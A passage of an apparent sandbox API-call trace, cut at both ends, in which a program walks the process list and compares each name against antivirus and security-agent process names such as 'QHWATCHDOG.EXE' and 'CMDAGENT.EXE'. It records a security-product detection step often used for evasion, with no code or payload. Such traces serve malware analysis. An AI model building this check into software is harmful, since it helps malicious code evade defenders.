lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.124] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.124] lstrlenW (lpString="svchost.exe") returned 11 [0163.124] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.124] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.124] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.124] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.124] lstrlenW (lpString="svchost.exe") returned 11 [0163.124] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.124] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.124] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.125] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.125] lstrlenW (lpString="winpoint.exe") returned 12 [0163.125] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.125] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="QHWATCHDOG.EXE") returned 1 [0163.125] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.126] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.126] lstrlenW (lpString="cmd.exe") returned 7 [0163.126] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.126] lstrcmpW (lpString1="CMD.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.126] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.127] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.127] lstrlenW (lpString="conhost.exe") returned 11 [0163.127] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.127] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.127] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.128] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.128] lstrlenW (lpString="PING.EXE") returned 8 [0163.128] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.128] lstrcmpW (lpString1="PING.EXE", lpString2="QHWATCHDOG.EXE") returned -1 [0163.128] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.128] CloseHandle (hObject=0xe0) returned 1 [0163.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.130] lstrcpyW (in: lpString1=0x18f8e4, lpString2="CMDAGENT.EXE" | out: lpString1="CMDAGENT.EXE") returned="CMDAGENT.EXE" [0163.130] lstrlenW (lpString="CMDAGENT.EXE") returned 12 [0163.130] CharUpperBuffW (in: lpsz="CMDAGENT.EXE", cchLength=0xc | out: lpsz="CMDAGENT.EXE") returned 0xc [0163.130] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.131] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.131] lstrlenW (lpString="[System Process]") returned 16 [0163.131] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.131] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="CMDAGENT.EXE") returned -1 [0163.131] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.132] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.132] lstrlenW (lpString="System") returned 6 [0163.132] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.132] lstrcmpW (lpString1="SYSTEM", lpString2="CMDAGENT.EXE") returned 1 [0163.132] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.132] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.132] lstrlenW (lpString="smss.exe") returned 8 [0163.132] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.132] lstrcmpW (lpString1="SMSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.132] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.133] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.133] lstrlenW (lpString="csrss.exe") returned 9 [0163.133] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.133] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.133] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.134] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.134] lstrlenW (lpString="wininit.exe") returned 11 [0163.134] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.134] lstrcmpW (lpString1="WININIT.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.134] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.134] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.134] lstrlenW (lpString="csrss.exe") returned 9 [0163.134] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.134] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.134] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.135] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.135] lstrlenW (lpString="winlogon.exe") returned 12 [0163.135] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.135] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.135] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.135] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.135] lstrlenW (lpString="services.exe") returned 12 [0163.135] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.135] lstrcmpW (lpString1="SERVICES.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.135] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.136] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.136] lstrlenW (lpString="lsass.exe") returned 9 [0163.136] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.136] lstrcmpW (lpString1="LSASS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.136] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.136] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.136] lstrlenW (lpString="lsm.exe") returned 7 [0163.137] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.137] lstrcmpW (lpString1="LSM.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.137] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.137] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.137] lstrlenW (lpString="svchost.exe") returned 11 [0163.137] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.137] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.137] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.138] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.138] lstrlenW (lpString="svchost.exe") returned 11 [0163.138] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.138] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.138] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.138] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.138] lstrlenW (lpString="svchost.exe") returned 11 [0163.138] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.138] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.138] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.139] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.139] lstrlenW (lpString="svchost.exe") returned 11 [0163.139] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.139] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.139] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.139] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.139] lstrlenW (lpString="svchost.exe") returned 11 [0163.139] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.139] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.139] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.140] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.140] lstrlenW (lpString="audiodg.exe") returned 11 [0163.140] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.140] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.140] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.153] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.153] lstrlenW (lpString="svchost.exe") returned 11 [0163.153] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.153] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.153] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.153] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.153] lstrlenW (lpString="svchost.exe") returned 11 [0163.153] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.153] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.153] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.154] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.154] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.154] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.154] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.154] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.154] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.154] lstrlenW (lpString="svchost.exe") returned 11 [0163.154] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.154] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.154] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.155] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.155] lstrlenW (lpString="taskhost.exe") returned 12 [0163.155] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.155] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.155] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.155] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.155] lstrlenW (lpString="taskeng.exe") returned 11 [0163.155] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.155] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.155] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.156] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.156] lstrlenW (lpString="dwm.exe") returned 7 [0163.156] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.156] lstrcmpW (lpString1="DWM.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.156] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.157] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.157] lstrlenW (lpString="explorer.exe") returned 12 [0163.157] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.157] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.157] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.157] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.157] lstrlenW (lpString="taskeng.exe") returned 11 [0163.157] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.157] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.157] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.158] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.158] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.158] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.158] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.158] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.159] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.159] lstrlenW (lpString="taskhost.exe") returned 12 [0163.159] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.159] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.159] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.160] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.160] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.160] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.160] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.160] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.160] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.160] lstrlenW (lpString="tri.exe") returned 7 [0163.160] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.160] lstrcmpW (lpString1="TRI.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.161] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.161] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.161] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.161] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.161] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.161] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.162] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.162] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.162] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.162] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.162] Process32NextW (in: 